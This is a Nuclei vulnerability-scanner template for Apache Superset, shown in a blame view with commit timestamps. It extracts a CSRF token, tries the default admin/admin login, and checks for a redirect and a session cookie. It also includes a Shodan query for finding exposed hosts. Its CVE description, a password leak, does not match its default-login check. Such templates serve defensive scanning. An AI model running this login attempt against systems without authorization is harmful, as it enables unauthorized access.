nuclei-templates/cves/2021/CVE-2021-44451.yaml

75 lines
1.9 KiB
YAML
Raw Normal View History

id: CVE-2021-44451
info:
2021-09-22 10:37:07 +00:00
name: Apache Superset Default Login
author: dhiyaneshDK
severity: medium
description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-44451
cwe-id: CWE-522
metadata:
shodan-query: title:"Superset"
verified: true
2022-04-22 16:43:51 +00:00
tags: cve,cve2021,apache,superset,default-login
requests:
2021-07-23 21:19:55 +00:00
- raw:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
2021-07-23 19:33:06 +00:00
2021-07-23 21:19:55 +00:00
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
2021-10-10 01:40:47 +00:00
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
2021-10-10 01:40:47 +00:00
attack: pitchfork
payloads:
username:
- admin
password:
- admin
2021-07-23 21:19:55 +00:00
extractors:
- type: regex
2021-10-10 01:40:47 +00:00
name: csrf_token
2021-07-23 21:19:55 +00:00
group: 1
part: body
internal: true
regex:
- 'value="(.*?)">'
matchers-condition: and
matchers:
- type: word
2021-07-23 21:19:55 +00:00
part: body
condition: and
words:
2021-07-23 19:33:06 +00:00
- '<title>Redirecting...</title>'
- '<h1>Redirecting...</h1'
- '<a href="/">'
2021-07-23 21:19:55 +00:00
- type: word
part: header
words:
- 'session'
- type: status
status:
2021-07-23 19:33:06 +00:00
- 302
# Enhanced by mp on 2022/03/02